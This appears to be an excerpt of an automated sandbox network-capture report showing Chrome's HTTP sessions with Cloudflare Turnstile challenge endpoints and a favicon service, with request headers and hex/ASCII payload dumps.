                                        2024-12-17 14:46:00 UTC1369INData Raw: 6c 63 30 48 56 6f 64 56 52 77 5a 61 57 63 7a 4b 31 77 36 5a 7a 73 38 59 55 41 79 61 57 5a 75 52 44 64 46 62 47 5a 64 65 6c 70 63 55 7a 6c 31 64 59 4e 62 63 59 46 44 65 31 78 5a 53 6d 65 4d 6a 57 56 61 66 6f 78 71 61 57 4e 53 63 32 4b 51 64 5a 6c 32 6c 32 75 42 64 36 4a 75 6f 70 5a 69 64 6d 43 59 6c 34 68 6f 61 6e 2b 64 65 32 4f 61 6b 35 47 4a 6c 59 57 6e 6d 5a 71 6b 6d 4b 36 2b 75 4c 53 37 6c 4c 6d 5a 66 4b 65 31 79 4c 71 6b 6f 71 75 49 72 70 32 48 75 74 43 7a 6a 73 43 4d 79 61 71 72 32 72 71 35 6b 39 32 72 71 4a 69 61 6e 4e 33 55 6d 4e 6e 47 76 36 4c 4a 34 39 36 70 76 63 54 6e 38 4b 32 71 72 62 62 71 77 63 4f 31 32 50 62 57 36 4d 66 6f 33 2b 2f 43 35 65 4c 62 38 64 54 6d 41 65 54 43 42 4f 49 4b 44 76 76 64 46 51 49 55 37 4d 37 76 35 65 59 49 30 74 6a 76
                                        Data Ascii: lc0HVodVRwZaWczK1w6Zzs8YUAyaWZuRDdFbGZdelpcUzl1dYNbcYFDe1xZSmeMjWVafoxqaWNSc2KQdZl2l2uBd6JuopZidmCYl4hoan+de2Oak5GJlYWnmZqkmK6+uLS7lLmZfKe1yLqkoquIrp2HutCzjsCMyaqr2rq5k92rqJianN3UmNnGv6LJ496pvcTn8K2qrbbqwcO12PbW6Mfo3+/C5eLb8dTmAeTCBOIKDvvdFQIU7M7v5eYI0tjv
                                        2024-12-17 14:46:00 UTC1369INData Raw: 70 44 4f 6c 74 63 4e 7a 35 4c 52 54 68 6f 59 32 35 41 61 7a 52 65 59 32 56 35 52 6d 70 6b 58 46 6b 37 53 54 35 61 4f 31 6d 43 62 32 64 42 69 45 5a 6c 61 57 52 70 68 45 64 62 63 57 74 75 62 6f 6c 6d 6b 5a 57 58 65 6e 56 6f 57 33 4a 79 6a 32 4b 56 62 58 79 46 6d 6c 70 69 65 6d 4b 58 6c 6f 36 61 71 6d 6d 49 62 59 75 4d 71 70 53 70 6d 71 36 72 6d 72 47 4e 6c 35 4b 63 65 35 4b 33 6b 73 61 48 67 34 65 57 68 35 32 4d 6e 70 36 51 72 4c 4f 2f 6f 4b 37 4a 70 74 61 59 78 37 71 35 71 4a 79 66 75 64 4b 7a 75 63 2f 45 6e 64 48 66 70 4f 66 6e 79 64 62 4b 70 62 6e 4b 71 38 6a 4a 38 4c 4c 68 32 62 62 30 2b 4d 6e 53 31 37 34 41 76 4e 6e 61 78 4d 38 48 38 64 6e 4a 42 67 6e 45 31 2b 6a 42 41 50 72 65 36 52 44 30 30 41 58 55 36 66 51 57 45 42 2f 30 2f 51 2f 33 47 42 67 53 45
                                        Data Ascii: pDOltcNz5LRThoY25AazReY2V5RmpkXFk7ST5aO1mCb2dBiEZlaWRphEdbcWtubolmkZWXenVoW3Jyj2KVbXyFmlpiemKXlo6aqmmIbYuMqpSpmq6rmrGNl5Kce5K3ksaHg4eWh52Mnp6QrLO/oK7JptaYx7q5qJyfudKzuc/EndHfpOfnydbKpbnKq8jJ8LLh2bb0+MnS174AvNnaxM8H8dnJBgnE1+jBAPre6RD00AXU6fQWEB/0/Q/3GBgSE
                                        2024-12-17 14:46:00 UTC1369INData Raw: 71 56 7a 67 75 50 6c 78 48 51 32 31 4e 53 31 64 74 54 6c 4e 78 52 30 74 65 59 55 70 41 56 48 70 32 66 31 78 57 69 58 59 39 53 45 4e 41 58 32 79 53 6a 47 4a 53 6b 58 36 4a 56 6f 47 49 6c 48 78 63 64 31 36 50 6e 70 46 2b 59 31 79 65 63 47 53 4a 67 5a 36 5a 66 59 47 6d 6e 6f 43 52 73 37 47 46 6f 47 32 67 6b 37 43 4a 6b 6e 6c 30 73 4c 31 39 72 5a 32 6b 6c 70 43 68 78 63 4f 33 68 63 62 45 6e 62 65 38 79 35 7a 4d 71 35 4c 51 72 4e 4f 73 31 72 4f 79 75 4a 71 77 79 37 2b 64 6e 4e 4b 68 70 4d 44 49 33 71 6e 6c 36 75 43 74 7a 2b 62 4d 38 4f 6e 4d 78 38 58 49 7a 39 48 6c 32 39 48 72 79 4e 51 42 37 2f 76 5a 2b 4d 44 79 31 74 55 45 44 4d 58 6c 79 63 55 45 45 41 59 55 38 76 37 56 38 2b 49 52 45 76 54 52 37 51 33 79 43 76 7a 71 48 76 7a 65 46 42 63 70 42 76 51 67 48 79
                                        Data Ascii: qVzguPlxHQ21NS1dtTlNxR0teYUpAVHp2f1xWiXY9SENAX2ySjGJSkX6JVoGIlHxcd16PnpF+Y1yecGSJgZ6ZfYGmnoCRs7GFoG2gk7CJknl0sL19rZ2klpChxcO3hcbEnbe8y5zMq5LQrNOs1rOyuJqwy7+dnNKhpMDI3qnl6uCtz+bM8OnMx8XIz9Hl29HryNQB7/vZ+MDy1tUEDMXlycUEEAYU8v7V8+IREvTR7Q3yCvzqHvzeFBcpBvQgHy
                                        2024-12-17 14:46:00 UTC1369INData Raw: 53 79 34 78 51 46 51 30 4d 48 56 56 4f 6d 39 67 57 32 70 71 54 6c 4e 41 63 59 68 34 67 56 6d 4d 61 6b 64 4c 59 5a 42 36 67 47 2b 54 69 34 6c 70 56 33 56 56 68 6f 71 46 6c 58 5a 35 57 35 32 51 67 5a 31 6a 5a 6e 6c 30 66 49 4b 61 71 35 71 43 61 59 71 53 6b 47 36 72 67 6f 32 73 71 49 69 38 73 58 4f 39 73 33 65 7a 75 6f 4f 77 6b 63 57 6a 74 35 4b 33 6d 61 4f 46 71 4b 75 6a 71 71 58 43 70 4b 75 69 74 73 2b 6c 74 70 53 63 7a 35 6d 58 32 4e 4b 5a 6e 62 43 6b 75 65 62 41 74 75 62 4b 77 4f 57 6d 6f 65 33 61 34 4d 2b 78 31 61 33 31 31 37 57 36 79 66 50 5a 76 41 48 65 2b 66 44 58 42 74 49 44 38 77 6b 45 33 4f 62 55 36 74 33 39 44 63 73 51 37 65 2f 32 30 67 55 4f 35 65 6b 48 45 68 44 38 43 51 33 39 37 77 49 63 33 39 6a 32 46 2b 4d 6c 2b 67 67 73 42 50 6f 53 45 76 48
                                        Data Ascii: Sy4xQFQ0MHVVOm9gW2pqTlNAcYh4gVmMakdLYZB6gG+Ti4lpV3VVhoqFlXZ5W52QgZ1jZnl0fIKaq5qCaYqSkG6rgo2sqIi8sXO9s3ezuoOwkcWjt5K3maOFqKujqqXCpKuits+ltpScz5mX2NKZnbCkuebAtubKwOWmoe3a4M+x1a3117W6yfPZvAHe+fDXBtID8wkE3ObU6t39DcsQ7e/20gUO5ekHEhD8CQ397wIc39j2F+Ml+ggsBPoSEvH
                                        2024-12-17 14:46:00 UTC1369INData Raw: 45 73 33 61 45 35 56 66 44 31 4b 4f 57 52 57 57 58 74 7a 51 47 52 4c 52 48 79 47 69 59 4a 4b 58 49 53 48 58 6f 65 4b 69 70 47 48 56 6d 64 75 61 48 71 49 65 58 2b 51 6b 35 4a 33 6e 32 4b 43 67 71 57 61 64 36 79 6d 6e 47 4f 63 6e 35 2b 65 6b 6f 75 69 65 49 53 45 75 6f 69 64 71 4c 43 58 6c 37 36 31 72 6f 43 76 6c 5a 47 32 78 4d 6d 2f 76 38 2b 77 6d 73 58 52 77 70 53 71 7a 5a 4f 53 32 4c 61 53 31 39 6e 5a 32 36 6d 75 6e 72 36 74 30 64 58 43 70 63 57 70 78 73 69 6e 77 36 72 62 7a 63 72 41 73 39 4b 31 77 74 58 77 2b 50 71 32 75 74 48 58 75 63 33 4c 32 73 34 45 39 66 58 31 35 67 6b 4e 34 39 63 46 41 77 72 50 46 4e 4d 55 43 67 50 78 35 63 7a 79 38 64 73 50 38 69 45 59 47 2f 66 7a 31 78 33 37 43 43 4c 33 44 42 58 71 4b 76 6b 44 47 78 77 56 42 78 66 74 4d 69 62 32
                                        Data Ascii: Es3aE5VfD1KOWRWWXtzQGRLRHyGiYJKXISHXoeKipGHVmduaHqIeX+Qk5J3n2KCgqWad6ymnGOcn5+ekouieISEuoidqLCXl761roCvlZG2xMm/v8+wmsXRwpSqzZOS2LaS19nZ26munr6t0dXCpcWpxsinw6rbzcrAs9K1wtXw+Pq2utHXuc3L2s4E9fX15gkN49cFAwrPFNMUCgPx5czy8dsP8iEYG/fz1x37CCL3DBXqKvkDGxwVBxftMib2


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.174971689.35.237.1704433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:59 UTC586OUTGET /modula.com HTTP/1.1
                                        Host: api.faviconkit.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://sqcconnect.com/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:03 UTC734INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:03 GMT
                                        Content-Type: image/png
                                        Content-Length: 9305
                                        Connection: close
                                        Server: BunnyCDN-RI1-892
                                        CDN-PullZone: 696107
                                        CDN-Uid: dd436633-06a0-4b73-b702-b97515feba7a
                                        CDN-RequestCountryCode: US
                                        Age: 0
                                        Cache-Control: public, max-age=31919000
                                        CDN-StorageBalancer: DE-633
                                        Perma-Cache: MISS
                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                        X-Vercel-Cache: MISS
                                        X-Vercel-Id: sfo1::sfo1::b4rxz-1734446760674-47df017bfb8c
                                        CDN-ProxyVer: 1.06
                                        CDN-RequestPullSuccess: True
                                        CDN-RequestPullCode: 200
                                        CDN-CachedAt: 12/17/2024 14:46:03
                                        CDN-EdgeStorageId: 892
                                        CDN-Status: 200
                                        CDN-RequestTime: 0
                                        CDN-RequestId: 7c2ef6a9f89dbdc40fb50e56fdd5a540
                                        CDN-Cache: MISS
                                        2024-12-17 14:46:03 UTC9305INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 24 20 49 44 41 54 78 da ec d8 3d 6e 54 41 0c c0 f1 27 84 28 b6 a4 b4 7b 44 11 21 4a 4a 2a c4 09 88 12 25 87 a1 e0 20 f6 0d 38 0b 15 da 13 50 52 44 c8 6e c2 f2 5e bc 33 6f b2 2b 1a 1e 05 fc 7f 92 35 9f 6f 2a ef c8 b3 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 37 d2 f5 69 ba be 4c d7 d7 bf 8b 98 a3 c6 43 df d6 6d ba fc 6a 5f a5 eb f3 09 f8 4b c9 fc 2e 5d bf a4 e9 5d b8 44 b8 46 9e 0a 7b bc 16 4b b4 f1 d0 a6 cd f1 23 5c bf 85 c9 c7 74 79 36 01 5b 49 d3 37 e9 fa 3d 5d ef c3 e4 3e 5a fb 10 b2 9a cf e3 9c 1e fb e9 d5 ef f6 98 d4 5a ed ad b5 4f 13 b0 95 74 fd 5c 09 99 b6 24 dd d2 b6 48 ab f5 21
                                        Data Ascii: PNGIHDR=2$ IDATx=nTA'({D!JJ*% 8PRDn^3o+5o*7iLCmj_K.]]DF{K#\ty6[I7=]>ZZOt\$H!


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.1749720104.18.94.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:02 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/336816551:1734444914:H7AwvCHEDObeSZScAcpjc5TTruO7fZKfwv33awfQW9E/8f37b31c6b081a48/hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:02 UTC379INHTTP/1.1 404 Not Found
                                        Date: Tue, 17 Dec 2024 14:46:02 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        cf-chl-out: 7TpeVpuKHhHItd5684ulMuTx7MvyiPZzIY8=$+PJ7hVdDz+qldscn
                                        Server: cloudflare
                                        CF-RAY: 8f37b34a2d5117ad-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:46:02 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.1749721104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:02 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f37b31c6b081a48/1734446759969/c1142f163fc1c29288a0cfa12faf7d55d96029302270ed9bae2be5d9724f6269/5PlURqfpRSBIM7f HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Cache-Control: max-age=0
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:03 UTC143INHTTP/1.1 401 Unauthorized
                                        Date: Tue, 17 Dec 2024 14:46:03 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 1
                                        Connection: close
                                        2024-12-17 14:46:03 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 77 52 51 76 46 6a 5f 42 77 70 4b 49 6f 4d 2d 68 4c 36 39 39 56 64 6c 67 4b 54 41 69 63 4f 32 62 72 69 76 6c 32 58 4a 50 59 6d 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gwRQvFj_BwpKIoM-hL699VdlgKTAicO2brivl2XJPYmkAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                        2024-12-17 14:46:03 UTC1INData Raw: 4a
                                        Data Ascii: J


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.1749723104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:05 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f37b31c6b081a48/1734446759973/CLx1W--8BWsJolI HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:06 UTC200INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:05 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        Server: cloudflare
                                        CF-RAY: 8f37b35f0c9b41ec-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:46:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 05 08 02 00 00 00 e0 d1 aa cb 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.174972289.35.237.1704433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:05 UTC352OUTGET /modula.com HTTP/1.1
                                        Host: api.faviconkit.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:06 UTC733INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:06 GMT
                                        Content-Type: image/png
                                        Content-Length: 9305
                                        Connection: close
                                        Server: BunnyCDN-RI1-892
                                        CDN-PullZone: 696107
                                        CDN-Uid: dd436633-06a0-4b73-b702-b97515feba7a
                                        CDN-RequestCountryCode: US
                                        Age: 0
                                        Cache-Control: public, max-age=31919000
                                        CDN-StorageBalancer: DE-633
                                        Perma-Cache: MISS
                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                        X-Vercel-Cache: MISS
                                        X-Vercel-Id: sfo1::sfo1::b4rxz-1734446760674-47df017bfb8c
                                        CDN-ProxyVer: 1.06
                                        CDN-RequestPullSuccess: True
                                        CDN-RequestPullCode: 200
                                        CDN-CachedAt: 12/17/2024 14:46:03
                                        CDN-EdgeStorageId: 892
                                        CDN-Status: 200
                                        CDN-RequestTime: 1
                                        CDN-RequestId: e84e9eef8d38c2b5bd7e93ee264835ab
                                        CDN-Cache: HIT
                                        2024-12-17 14:46:06 UTC9305INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 24 20 49 44 41 54 78 da ec d8 3d 6e 54 41 0c c0 f1 27 84 28 b6 a4 b4 7b 44 11 21 4a 4a 2a c4 09 88 12 25 87 a1 e0 20 f6 0d 38 0b 15 da 13 50 52 44 c8 6e c2 f2 5e bc 33 6f b2 2b 1a 1e 05 fc 7f 92 35 9f 6f 2a ef c8 b3 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 37 d2 f5 69 ba be 4c d7 d7 bf 8b 98 a3 c6 43 df d6 6d ba fc 6a 5f a5 eb f3 09 f8 4b c9 fc 2e 5d bf a4 e9 5d b8 44 b8 46 9e 0a 7b bc 16 4b b4 f1 d0 a6 cd f1 23 5c bf 85 c9 c7 74 79 36 01 5b 49 d3 37 e9 fa 3d 5d ef c3 e4 3e 5a fb 10 b2 9a cf e3 9c 1e fb e9 d5 ef f6 98 d4 5a ed ad b5 4f 13 b0 95 74 fd 5c 09 99 b6 24 dd d2 b6 48 ab f5 21
                                        Data Ascii: PNGIHDR=2$ IDATx=nTA'({D!JJ*% 8PRDn^3o+5o*7iLCmj_K.]]DF{K#\ty6[I7=]>ZZOt\$H!


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.1749724104.18.94.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:07 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f37b31c6b081a48/1734446759973/CLx1W--8BWsJolI HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:07 UTC200INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:07 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        Server: cloudflare
                                        CF-RAY: 8f37b36978ec430f-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:46:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 05 08 02 00 00 00 e0 d1 aa cb 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.1749725104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:07 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/336816551:1734444914:H7AwvCHEDObeSZScAcpjc5TTruO7fZKfwv33awfQW9E/8f37b31c6b081a48/hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 31900
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:07 UTC16384OUTData Raw: 76 5f 38 66 33 37 62 33 31 63 36 62 30 38 31 61 34 38 3d 48 75 36 4d 37 30 74 64 6b 78 75 74 6b 6f 64 74 70 42 67 42 32 6f 7a 74 44 48 42 68 42 39 4d 42 75 74 53 42 72 32 53 41 74 39 24 43 42 67 42 78 36 24 78 42 73 37 4f 41 36 6b 30 73 55 36 42 48 30 42 24 66 42 68 4d 58 7a 7a 7a 43 30 42 30 34 42 59 39 24 31 6a 7a 4f 41 42 35 42 6f 41 30 78 42 2d 41 24 45 35 68 72 42 42 4b 42 4e 41 30 4b 42 4a 71 38 55 2d 42 74 55 75 37 73 42 74 43 35 62 6b 42 6c 55 33 2d 37 63 74 54 4d 63 41 41 25 32 62 50 42 42 76 71 42 6b 6e 4d 74 76 42 31 52 42 4e 4d 42 70 71 4d 30 70 75 34 7a 4b 57 42 24 53 30 64 57 51 71 64 35 57 42 74 36 4b 30 6c 78 51 62 52 57 4b 37 2d 41 42 56 71 4d 6b 64 36 53 7a 46 57 7a 4b 64 6e 39 42 6c 53 2b 4b 6e 53 47 73 6d 61 59 2b 42 4a 32 2b 37 72 4e
                                        Data Ascii: v_8f37b31c6b081a48=Hu6M70tdkxutkodtpBgB2oztDHBhB9MButSBr2SAt9$CBgBx6$xBs7OA6k0sU6BH0B$fBhMXzzzC0B04BY9$1jzOAB5BoA0xB-A$E5hrBBKBNA0KBJq8U-BtUu7sBtC5bkBlU3-7ctTMcAA%2bPBBvqBknMtvB1RBNMBpqM0pu4zKWB$S0dWQqd5WBt6K0lxQbRWK7-ABVqMkd6SzFWzKdn9BlS+KnSGsmaY+BJ2+7rN
                                        2024-12-17 14:46:07 UTC15516OUTData Raw: 74 73 30 7a 74 46 42 43 42 47 42 6f 48 68 6e 30 6d 71 73 4d 4e 42 74 42 4f 41 30 39 74 4c 42 6e 64 61 7a 74 51 42 72 42 6f 66 42 6c 6b 6f 41 42 62 42 79 42 4f 41 58 75 74 24 42 59 39 24 79 74 65 42 67 41 24 45 74 58 42 6c 39 24 64 74 36 57 4f 36 6f 79 66 6c 42 30 41 74 42 74 65 42 47 30 24 42 74 47 42 59 6d 78 62 74 5a 7a 36 41 24 6e 42 39 42 61 6b 24 42 74 64 36 42 44 62 72 38 70 4d 65 39 6f 65 42 62 42 52 45 6f 36 24 57 4d 64 4d 4e 36 2b 70 4d 47 30 24 41 74 65 42 4d 4d 31 59 74 47 42 48 4d 48 36 24 47 42 68 4d 6f 45 38 71 39 65 39 78 75 24 78 42 52 45 6f 65 74 76 6e 6e 42 7a 52 42 4c 42 71 39 74 5a 56 24 54 34 54 76 41 74 62 42 72 42 24 55 7a 24 42 72 52 59 48 79 69 4b 67 54 44 35 6f 2d 42 6c 4d 30 35 57 76 42 41 42 4a 75 74 56 2d 7a 42 31 39 24 39 42
                                        Data Ascii: ts0ztFBCBGBoHhn0mqsMNBtBOA09tLBndaztQBrBofBlkoABbByBOAXut$BY9$yteBgA$EtXBl9$dt6WO6oyflB0AtBteBG0$BtGBYmxbtZz6A$nB9Bak$Btd6BDbr8pMe9oeBbBREo6$WMdMN6+pMG0$AteBMM1YtGBHMH6$GBhMoE8q9e9xu$xBREoetvnnBzRBLBq9tZV$T4TvAtbBrB$Uz$BrRYHyiKgTD5o-BlM05WvBABJutV-zB19$9B
                                        2024-12-17 14:46:08 UTC1097INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4544
                                        Connection: close
                                        cf-chl-out: RHH585kPjMQyFwA+qwhIwGZEvtoMR4hp3DrEa5c7TLnFv7g/HYHzmJis9Yd3pK9BrvrbM4XZx/lO5b/vyLOxyuIw+7DYnEoFBNbfaUixYjs3CYGk9jzeVxA=$KaygGQCOq8qcIe5E
